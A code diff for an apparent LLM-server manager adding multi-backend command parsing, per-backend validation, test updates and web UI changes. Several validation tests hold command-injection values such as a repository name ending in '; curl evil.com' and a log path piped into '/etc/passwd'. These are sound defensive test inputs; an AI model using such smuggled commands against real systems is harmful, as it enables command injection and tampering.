if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
mlxOptions, err := mlx.ParseMlxCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
// Currently only support mlx_lm backend type
backendType := backends.BackendTypeMlxLm
options := &instance.CreateInstanceOptions{
BackendType: backendType,
MlxServerOptions: mlxOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
}
}
}
// ParseVllmCommand godoc
// @Summary Parse vllm serve command
// @Description Parses a vLLM serve command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /backends/vllm/parse-command [post]
func (h *Handler) ParseVllmCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
vllmOptions, err := vllm.ParseVllmCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
backendType := backends.BackendTypeVllm
options := &instance.CreateInstanceOptions{
BackendType: backendType,
VllmServerOptions: vllmOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
}
}
}
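A hedged client-side sketch for the new parse-command endpoints; the /api/v1 prefix, server address, and Authorization header are assumptions about the deployment, and only the relative routes come from this diff (see the router changes below):

package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"net/http"
)

func main() {
	// Request body matches ParseCommandRequest.
	body, _ := json.Marshal(map[string]string{
		"command": "llama-server --model /models/llama.gguf --port 8080",
	})
	// Base URL, port, and auth header are assumed, not taken from the diff.
	req, err := http.NewRequest(http.MethodPost,
		"http://localhost:8080/api/v1/backends/llama-cpp/parse-command",
		bytes.NewReader(body))
	if err != nil {
		panic(err)
	}
	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("Authorization", "Bearer <management-api-key>") // assumed

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	// On success the handler returns the parsed instance.CreateInstanceOptions.
	var options map[string]any
	if err := json.NewDecoder(resp.Body).Decode(&options); err != nil {
		panic(err)
	}
	fmt.Printf("%+v\n", options)
}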


@@ -44,10 +44,20 @@ func SetupRouter(handler *Handler) *chi.Mux {
r.Get("/version", handler.VersionHandler()) // Get server version
r.Route("/server", func(r chi.Router) {
r.Get("/help", handler.LlamaServerHelpHandler())
r.Get("/version", handler.LlamaServerVersionHandler())
r.Get("/devices", handler.LlamaServerListDevicesHandler())
// Backend-specific endpoints
r.Route("/backends", func(r chi.Router) {
r.Route("/llama-cpp", func(r chi.Router) {
r.Get("/help", handler.LlamaServerHelpHandler())
r.Get("/version", handler.LlamaServerVersionHandler())
r.Get("/devices", handler.LlamaServerListDevicesHandler())
r.Post("/parse-command", handler.ParseLlamaCommand())
})
r.Route("/mlx", func(r chi.Router) {
r.Post("/parse-command", handler.ParseMlxCommand())
})
r.Route("/vllm", func(r chi.Router) {
r.Post("/parse-command", handler.ParseVllmCommand())
})
})
// Instance management endpoints


@@ -2,6 +2,7 @@ package validation
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"reflect"
"regexp"
@@ -33,20 +34,76 @@ func validateStringForInjection(value string) error {
return nil
}
// ValidateInstanceOptions performs minimal security validation
// ValidateInstanceOptions performs validation based on backend type
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil"))
}
// Validate based on backend type
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
return validateLlamaCppOptions(options)
case backends.BackendTypeMlxLm:
return validateMlxOptions(options)
case backends.BackendTypeVllm:
return validateVllmOptions(options)
default:
return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
}
}
// validateLlamaCppOptions validates llama.cpp specific options
func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
if options.LlamaServerOptions == nil {
return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(&options.LlamaServerOptions, ""); err != nil {
if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
return err
}
// Basic network validation - only check for reasonable ranges
if options.Port < 0 || options.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range"))
// Basic network validation for port
if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
}
return nil
}
// validateMlxOptions validates MLX backend specific options
func validateMlxOptions(options *instance.CreateInstanceOptions) error {
if options.MlxServerOptions == nil {
return ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
}
if err := validateStructStrings(options.MlxServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.MlxServerOptions.Port < 0 || options.MlxServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.MlxServerOptions.Port))
}
return nil
}
// validateVllmOptions validates vLLM backend specific options
func validateVllmOptions(options *instance.CreateInstanceOptions) error {
if options.VllmServerOptions == nil {
return ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(options.VllmServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.VllmServerOptions.Port < 0 || options.VllmServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.VllmServerOptions.Port))
}
return nil
}
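A simplified, runnable stand-in for the reflection-based string scan the validators above depend on (the real validateStructStrings lives elsewhere in pkg/validation and differs in detail):

package main

import (
	"fmt"
	"reflect"
	"strings"
)

// scanStrings walks string fields of a struct and rejects values containing
// shell-injection-style patterns, roughly what the backend validators do.
func scanStrings(v any) error {
	suspicious := []string{";", "|", "&", "`", "$("}
	val := reflect.ValueOf(v)
	if val.Kind() == reflect.Pointer {
		val = val.Elem()
	}
	for i := 0; i < val.NumField(); i++ {
		field := val.Field(i)
		if field.Kind() != reflect.String {
			continue
		}
		for _, pattern := range suspicious {
			if strings.Contains(field.String(), pattern) {
				return fmt.Errorf("field %s contains suspicious pattern %q",
					val.Type().Field(i).Name, pattern)
			}
		}
	}
	return nil
}

type serverOptions struct {
	Model   string
	LogFile string
}

func main() {
	ok := serverOptions{Model: "/models/safe.gguf", LogFile: "/tmp/llama.log"}
	bad := serverOptions{Model: "model.gguf; curl evil.com"}
	fmt.Println(scanStrings(&ok))  // <nil>
	fmt.Println(scanStrings(&bad)) // field Model contains suspicious pattern ";"
}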


@@ -1,6 +1,7 @@
package validation_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
@@ -83,7 +84,8 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: tt.port,
},
}
@@ -136,7 +138,8 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
t.Run(tt.name, func(t *testing.T) {
// Test with Model field (string field)
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: tt.value,
},
}
@@ -173,7 +176,8 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
t.Run(tt.name, func(t *testing.T) {
// Test with Lora field (array field)
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Lora: tt.array,
},
}
@@ -196,7 +200,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{
name: "injection in model field",
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf",
HFRepo: "microsoft/model; curl evil.com",
},
@@ -206,7 +211,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{
name: "injection in log file",
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf",
LogFile: "/tmp/log.txt | tee /etc/passwd",
},
@@ -216,7 +222,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{
name: "all safe fields",
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
HFRepo: "microsoft/DialoGPT-medium",
LogFile: "/tmp/llama.log",
@@ -244,7 +251,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
AutoRestart: testutil.BoolPtr(true),
MaxRestarts: testutil.IntPtr(5),
RestartDelay: testutil.IntPtr(10),
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: 8080,
GPULayers: 32,
CtxSize: 4096,

webui/package-lock.json (generated, 100 lines changed)

@@ -19,6 +19,7 @@
"lucide-react": "^0.525.0",
"react": "^19.1.0",
"react-dom": "^19.1.0",
"sonner": "^2.0.7",
"tailwind-merge": "^3.3.1",
"tailwindcss": "^4.1.11",
"zod": "^4.0.5"
@@ -42,7 +43,7 @@
"tw-animate-css": "^1.3.5",
"typescript": "^5.8.3",
"typescript-eslint": "^8.38.0",
"vite": "^7.0.5",
"vite": "^7.1.5",
"vitest": "^3.2.4"
}
},
@@ -2109,6 +2110,60 @@
"node": ">=14.0.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@emnapi/core": {
"version": "1.4.3",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"@emnapi/wasi-threads": "1.0.2",
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@emnapi/runtime": {
"version": "1.4.3",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@emnapi/wasi-threads": {
"version": "1.0.2",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@napi-rs/wasm-runtime": {
"version": "0.2.11",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"@emnapi/core": "^1.4.3",
"@emnapi/runtime": "^1.4.3",
"@tybys/wasm-util": "^0.9.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@tybys/wasm-util": {
"version": "0.9.0",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/tslib": {
"version": "2.8.0",
"inBundle": true,
"license": "0BSD",
"optional": true
},
"node_modules/@tailwindcss/oxide-win32-arm64-msvc": {
"version": "4.1.11",
"resolved": "https://registry.npmjs.org/@tailwindcss/oxide-win32-arm64-msvc/-/oxide-win32-arm64-msvc-4.1.11.tgz",
@@ -4190,10 +4245,13 @@
}
},
"node_modules/fdir": {
"version": "6.4.6",
"resolved": "https://registry.npmjs.org/fdir/-/fdir-6.4.6.tgz",
"integrity": "sha512-hiFoqpyZcfNm1yc4u8oWCf9A2c4D3QjCrks3zmoVKVxpQRzmPNar1hUJcBG2RQHvEVGDN+Jm81ZheVLAQMK6+w==",
"version": "6.5.0",
"resolved": "https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz",
"integrity": "sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==",
"license": "MIT",
"engines": {
"node": ">=12.0.0"
},
"peerDependencies": {
"picomatch": "^3 || ^4"
},
@@ -6693,6 +6751,16 @@
"node": ">=18"
}
},
"node_modules/sonner": {
"version": "2.0.7",
"resolved": "https://registry.npmjs.org/sonner/-/sonner-2.0.7.tgz",
"integrity": "sha512-W6ZN4p58k8aDKA4XPcx2hpIQXBRAgyiWVkYhT7CvK6D3iAu7xjvVyhQHg2/iaKJZ1XVJ4r7XuwGL+WGEK37i9w==",
"license": "MIT",
"peerDependencies": {
"react": "^18.0.0 || ^19.0.0 || ^19.0.0-rc",
"react-dom": "^18.0.0 || ^19.0.0 || ^19.0.0-rc"
}
},
"node_modules/source-map-js": {
"version": "1.2.1",
"resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz",
@@ -6973,13 +7041,13 @@
"license": "MIT"
},
"node_modules/tinyglobby": {
"version": "0.2.14",
"resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.14.tgz",
"integrity": "sha512-tX5e7OM1HnYr2+a2C/4V0htOcSQcoSTH9KgJnVvNm5zm/cyEWKJ7j7YutsH9CxMdtOkkLFy2AHrMci9IM8IPZQ==",
"version": "0.2.15",
"resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.15.tgz",
"integrity": "sha512-j2Zq4NyQYG5XMST4cbs02Ak8iJUdxRM0XI5QyxXuZOzKOINmWurp3smXu3y5wDcJrptwpSjgXHzIQxR0omXljQ==",
"license": "MIT",
"dependencies": {
"fdir": "^6.4.4",
"picomatch": "^4.0.2"
"fdir": "^6.5.0",
"picomatch": "^4.0.3"
},
"engines": {
"node": ">=12.0.0"
@@ -7356,17 +7424,17 @@
}
},
"node_modules/vite": {
"version": "7.0.5",
"resolved": "https://registry.npmjs.org/vite/-/vite-7.0.5.tgz",
"integrity": "sha512-1mncVwJxy2C9ThLwz0+2GKZyEXuC3MyWtAAlNftlZZXZDP3AJt5FmwcMit/IGGaNZ8ZOB2BNO/HFUB+CpN0NQw==",
"version": "7.1.5",
"resolved": "https://registry.npmjs.org/vite/-/vite-7.1.5.tgz",
"integrity": "sha512-4cKBO9wR75r0BeIWWWId9XK9Lj6La5X846Zw9dFfzMRw38IlTk2iCcUt6hsyiDRcPidc55ZParFYDXi0nXOeLQ==",
"license": "MIT",
"dependencies": {
"esbuild": "^0.25.0",
"fdir": "^6.4.6",
"picomatch": "^4.0.2",
"fdir": "^6.5.0",
"picomatch": "^4.0.3",
"postcss": "^8.5.6",
"rollup": "^4.40.0",
"tinyglobby": "^0.2.14"
"rollup": "^4.43.0",
"tinyglobby": "^0.2.15"
},
"bin": {
"vite": "bin/vite.js"


@@ -28,6 +28,7 @@
"lucide-react": "^0.525.0",
"react": "^19.1.0",
"react-dom": "^19.1.0",
"sonner": "^2.0.7",
"tailwind-merge": "^3.3.1",
"tailwindcss": "^4.1.11",
"zod": "^4.0.5"
@@ -51,7 +52,7 @@
"tw-animate-css": "^1.3.5",
"typescript": "^5.8.3",
"typescript-eslint": "^8.38.0",
"vite": "^7.0.5",
"vite": "^7.1.5",
"vitest": "^3.2.4"
}
}


@@ -8,6 +8,7 @@ import { type CreateInstanceOptions, type Instance } from "@/types/instance";
import { useInstances } from "@/contexts/InstancesContext";
import { useAuth } from "@/contexts/AuthContext";
import { ThemeProvider } from "@/contexts/ThemeContext";
import { Toaster } from "sonner";
function App() {
const { isAuthenticated, isLoading: authLoading } = useAuth();
@@ -30,9 +31,9 @@ function App() {
const handleSaveInstance = (name: string, options: CreateInstanceOptions) => {
if (editingInstance) {
updateInstance(editingInstance.name, options);
void updateInstance(editingInstance.name, options);
} else {
createInstance(name, options);
void createInstance(name, options);
}
};
@@ -85,6 +86,8 @@ function App() {
open={isSystemInfoModalOpen}
onOpenChange={setIsSystemInfoModalOpen}
/>
<Toaster />
</div>
</ThemeProvider>
);


@@ -5,6 +5,7 @@ import App from '@/App'
import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API
@@ -46,8 +47,8 @@ function renderApp() {
describe('App Component - Critical Business Logic Only', () => {
const mockInstances: Instance[] = [
{ name: 'test-instance-1', running: false, options: { model: 'model1.gguf' } },
{ name: 'test-instance-2', running: true, options: { model: 'model2.gguf' } }
{ name: 'test-instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'test-instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } }
]
beforeEach(() => {
@@ -81,8 +82,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup()
const newInstance: Instance = {
name: 'new-test-instance',
running: false,
options: { model: 'new-model.gguf' }
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'new-model.gguf' } }
}
vi.mocked(instancesApi.create).mockResolvedValue(newInstance)
@@ -105,6 +106,7 @@ describe('App Component - Critical Business Logic Only', () => {
await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith('new-test-instance', {
auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
})
})
@@ -118,8 +120,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup()
const updatedInstance: Instance = {
name: 'test-instance-1',
running: false,
options: { model: 'updated-model.gguf' }
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'updated-model.gguf' } }
}
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance)
@@ -138,7 +140,8 @@ describe('App Component - Critical Business Logic Only', () => {
// Verify correct API call with existing instance data
await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith('test-instance-1', {
model: "model1.gguf", // Pre-filled from existing instance
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "model1.gguf" } // Pre-filled from existing instance
})
})
})
@@ -157,7 +160,7 @@ describe('App Component - Critical Business Logic Only', () => {
expect(screen.getAllByTitle('Start instance').length).toBeGreaterThan(0)
expect(screen.getAllByTitle('Stop instance').length).toBeGreaterThan(0)
expect(screen.getAllByTitle('Edit instance').length).toBe(2)
expect(screen.getAllByTitle('Delete instance').length).toBeGreaterThan(0)
expect(screen.getAllByTitle('More actions').length).toBe(2)
})
it('delete confirmation calls correct API', async () => {
@@ -171,8 +174,17 @@ describe('App Component - Critical Business Logic Only', () => {
expect(screen.getByText('test-instance-1')).toBeInTheDocument()
})
const deleteButtons = screen.getAllByTitle('Delete instance')
await user.click(deleteButtons[0])
// First click the "More actions" button to reveal the delete button
const moreActionsButtons = screen.getAllByTitle('More actions')
await user.click(moreActionsButtons[0])
// Wait for the delete button to appear and click it
await waitFor(() => {
expect(screen.getByTitle('Delete instance')).toBeInTheDocument()
})
const deleteButton = screen.getByTitle('Delete instance')
await user.click(deleteButton)
// Verify confirmation and API call
expect(confirmSpy).toHaveBeenCalledWith('Are you sure you want to delete instance "test-instance-1"?')


@@ -0,0 +1,65 @@
import React from "react";
import { Badge } from "@/components/ui/badge";
import { BackendType, type BackendTypeValue } from "@/types/instance";
import { Server, Package } from "lucide-react";
interface BackendBadgeProps {
backend?: BackendTypeValue;
docker?: boolean;
}
const BackendBadge: React.FC<BackendBadgeProps> = ({ backend, docker }) => {
if (!backend) {
return null;
}
const getText = () => {
switch (backend) {
case BackendType.LLAMA_CPP:
return "llama.cpp";
case BackendType.MLX_LM:
return "MLX";
case BackendType.VLLM:
return "vLLM";
default:
return backend;
}
};
const getColorClasses = () => {
switch (backend) {
case BackendType.LLAMA_CPP:
return "bg-blue-100 text-blue-800 border-blue-200 dark:bg-blue-900 dark:text-blue-200 dark:border-blue-800";
case BackendType.MLX_LM:
return "bg-green-100 text-green-800 border-green-200 dark:bg-green-900 dark:text-green-200 dark:border-green-800";
case BackendType.VLLM:
return "bg-purple-100 text-purple-800 border-purple-200 dark:bg-purple-900 dark:text-purple-200 dark:border-purple-800";
default:
return "bg-gray-100 text-gray-800 border-gray-200 dark:bg-gray-900 dark:text-gray-200 dark:border-gray-800";
}
};
return (
<div className="flex items-center gap-1">
<Badge
variant="outline"
className={`flex items-center gap-1.5 ${getColorClasses()}`}
>
<Server className="h-3 w-3" />
<span className="text-xs">{getText()}</span>
</Badge>
{docker && (
<Badge
variant="outline"
className="flex items-center gap-1.5 bg-orange-100 text-orange-800 border-orange-200 dark:bg-orange-900 dark:text-orange-200 dark:border-orange-800"
title="Docker enabled"
>
<Package className="h-3 w-3" />
<span className="text-[10px] uppercase tracking-wide">Docker</span>
</Badge>
)}
</div>
);
};
export default BackendBadge;


@@ -2,24 +2,23 @@ import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox'
import type { CreateInstanceOptions } from '@/types/instance'
import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
import { getBackendFieldType, basicBackendFieldsConfig } from '@/lib/zodFormUtils'
interface ZodFormFieldProps {
fieldKey: keyof CreateInstanceOptions
interface BackendFormFieldProps {
fieldKey: string
value: string | number | boolean | string[] | undefined
onChange: (key: keyof CreateInstanceOptions, value: string | number | boolean | string[] | undefined) => void
onChange: (key: string, value: string | number | boolean | string[] | undefined) => void
}
const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
const BackendFormField: React.FC<BackendFormFieldProps> = ({ fieldKey, value, onChange }) => {
// Get configuration for basic fields, or use field name for advanced fields
const config = basicFieldsConfig[fieldKey as string] || { label: fieldKey }
const config = basicBackendFieldsConfig[fieldKey as string] || { label: fieldKey }
// Get type from Zod schema
const fieldType = getFieldType(fieldKey)
const fieldType = getBackendFieldType(fieldKey)
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey, newValue)
onChange(fieldKey as string, newValue)
}
const renderField = () => {
@@ -46,7 +45,6 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
@@ -73,7 +71,6 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
@@ -100,7 +97,6 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
@@ -120,4 +116,4 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
return <div className="space-y-2">{renderField()}</div>
}
export default ZodFormField
export default BackendFormField


@@ -27,6 +27,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return <XCircle className="h-3 w-3" />;
case "unknown":
return <Loader2 className="h-3 w-3 animate-spin" />;
case "failed":
return <XCircle className="h-3 w-3" />;
}
};
@@ -40,6 +42,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "destructive";
case "unknown":
return "secondary";
case "failed":
return "destructive";
}
};
@@ -53,6 +57,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "Error";
case "unknown":
return "Unknown";
case "failed":
return "Failed";
}
};


@@ -2,9 +2,10 @@
import { Button } from "@/components/ui/button";
import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
import type { Instance } from "@/types/instance";
import { Edit, FileText, Play, Square, Trash2 } from "lucide-react";
import { Edit, FileText, Play, Square, Trash2, MoreHorizontal } from "lucide-react";
import LogsDialog from "@/components/LogDialog";
import HealthBadge from "@/components/HealthBadge";
import BackendBadge from "@/components/BackendBadge";
import { useState } from "react";
import { useInstanceHealth } from "@/hooks/useInstanceHealth";
@@ -24,7 +25,8 @@ function InstanceCard({
editInstance,
}: InstanceCardProps) {
const [isLogsOpen, setIsLogsOpen] = useState(false);
const health = useInstanceHealth(instance.name, instance.running);
const [showAllActions, setShowAllActions] = useState(false);
const health = useInstanceHealth(instance.name, instance.status);
const handleStart = () => {
startInstance(instance.name);
@@ -50,38 +52,48 @@ function InstanceCard({
setIsLogsOpen(true);
};
const running = instance.status === "running";
return (
<>
<Card>
<CardHeader className="pb-3">
<div className="flex items-center justify-between">
<CardTitle className="text-lg">{instance.name}</CardTitle>
{instance.running && <HealthBadge health={health} />}
<Card className="hover:shadow-md transition-shadow">
<CardHeader className="pb-4">
{/* Header with instance name and status badges */}
<div className="space-y-3">
<CardTitle className="text-lg font-semibold leading-tight break-words">
{instance.name}
</CardTitle>
{/* Badges row */}
<div className="flex items-center gap-2 flex-wrap">
<BackendBadge backend={instance.options?.backend_type} docker={instance.docker_enabled} />
{running && <HealthBadge health={health} />}
</div>
</div>
</CardHeader>
<CardContent>
<div className="flex gap-1">
<CardContent className="pt-0">
{/* Primary actions - always visible */}
<div className="flex items-center gap-2 mb-3">
<Button
size="sm"
variant="outline"
onClick={handleStart}
disabled={instance.running}
title="Start instance"
data-testid="start-instance-button"
variant={running ? "outline" : "default"}
onClick={running ? handleStop : handleStart}
className="flex-1"
title={running ? "Stop instance" : "Start instance"}
data-testid={running ? "stop-instance-button" : "start-instance-button"}
>
<Play className="h-4 w-4" />
</Button>
<Button
size="sm"
variant="outline"
onClick={handleStop}
disabled={!instance.running}
title="Stop instance"
data-testid="stop-instance-button"
>
<Square className="h-4 w-4" />
{running ? (
<>
<Square className="h-4 w-4 mr-1" />
Stop
</>
) : (
<>
<Play className="h-4 w-4 mr-1" />
Start
</>
)}
</Button>
<Button
@@ -97,24 +109,40 @@ function InstanceCard({
<Button
size="sm"
variant="outline"
onClick={handleLogs}
title="View logs"
data-testid="view-logs-button"
onClick={() => setShowAllActions(!showAllActions)}
title="More actions"
>
<FileText className="h-4 w-4" />
</Button>
<Button
size="sm"
variant="destructive"
onClick={handleDelete}
disabled={instance.running}
title="Delete instance"
data-testid="delete-instance-button"
>
<Trash2 className="h-4 w-4" />
<MoreHorizontal className="h-4 w-4" />
</Button>
</div>
{/* Secondary actions - collapsible */}
{showAllActions && (
<div className="flex items-center gap-2 pt-2 border-t border-border">
<Button
size="sm"
variant="outline"
onClick={handleLogs}
title="View logs"
data-testid="view-logs-button"
className="flex-1"
>
<FileText className="h-4 w-4 mr-1" />
Logs
</Button>
<Button
size="sm"
variant="destructive"
onClick={handleDelete}
disabled={running}
title="Delete instance"
data-testid="delete-instance-button"
>
<Trash2 className="h-4 w-4" />
</Button>
</div>
)}
</CardContent>
</Card>
@@ -122,7 +150,7 @@ function InstanceCard({
open={isLogsOpen}
onOpenChange={setIsLogsOpen}
instanceName={instance.name}
isRunning={instance.running}
isRunning={running}
/>
</>
);


@@ -1,7 +1,5 @@
import React, { useState, useEffect } from "react";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { Label } from "@/components/ui/label";
import {
Dialog,
DialogContent,
@@ -10,10 +8,10 @@ import {
DialogHeader,
DialogTitle,
} from "@/components/ui/dialog";
import type { CreateInstanceOptions, Instance } from "@/types/instance";
import { getBasicFields, getAdvancedFields } from "@/lib/zodFormUtils";
import { ChevronDown, ChevronRight } from "lucide-react";
import ZodFormField from "@/components/ZodFormField";
import { BackendType, type CreateInstanceOptions, type Instance } from "@/types/instance";
import ParseCommandDialog from "@/components/ParseCommandDialog";
import InstanceSettingsCard from "@/components/instance/InstanceSettingsCard";
import BackendConfigurationCard from "@/components/instance/BackendConfigurationCard";
interface InstanceDialogProps {
open: boolean;
@@ -29,16 +27,12 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
instance,
}) => {
const isEditing = !!instance;
const isRunning = instance?.running || true; // Assume running if instance exists
const [instanceName, setInstanceName] = useState("");
const [formData, setFormData] = useState<CreateInstanceOptions>({});
const [showAdvanced, setShowAdvanced] = useState(false);
const [nameError, setNameError] = useState("");
const [showParseDialog, setShowParseDialog] = useState(false);
// Get field lists dynamically from the type
const basicFields = getBasicFields();
const advancedFields = getAdvancedFields();
// Reset form when dialog opens/closes or when instance changes
useEffect(() => {
@@ -52,17 +46,39 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
setInstanceName("");
setFormData({
auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP, // Default backend type
backend_options: {},
});
}
setShowAdvanced(false); // Always start with basic view
